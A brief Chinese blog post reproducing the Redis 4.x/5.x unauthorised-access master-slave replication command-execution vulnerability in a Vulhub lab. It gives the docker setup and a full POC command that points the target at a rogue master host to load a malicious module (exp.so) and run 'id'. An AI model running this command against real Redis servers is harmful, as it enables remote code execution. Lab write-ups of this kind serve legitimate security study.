5.x 主从复制导致的命令执行

Redis 4.x/5.x 主从复制导致的命令执行

Redis是著名的开源Key-Value数据库,其具备再沙箱中执行Lua脚本的能力。

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意目录。

环境搭建

cd vulhub/redis/4-unacc
docker0compose up -d

环境启动后,通过redis-cli -h 10.10.10.8即可进行连接,可见存在未授权访问漏洞。

漏洞复现

使用POC
python3 redis-master.py -r 10.10.10.8 -p 6379 -L 10.10.10.1 -P 8888 -f RedisModulesSDK/exp.so -c "id"
img

posted @   kalixcn  阅读(29)  评论(0编辑  收藏  举报
相关博文:
· Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
· rsync 未授权访问漏洞
· Redis 4.x/5.x 主从复制导致的命令执行
· redis 主从复制
· Redis 4.x/5.x 未授权访问漏洞
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛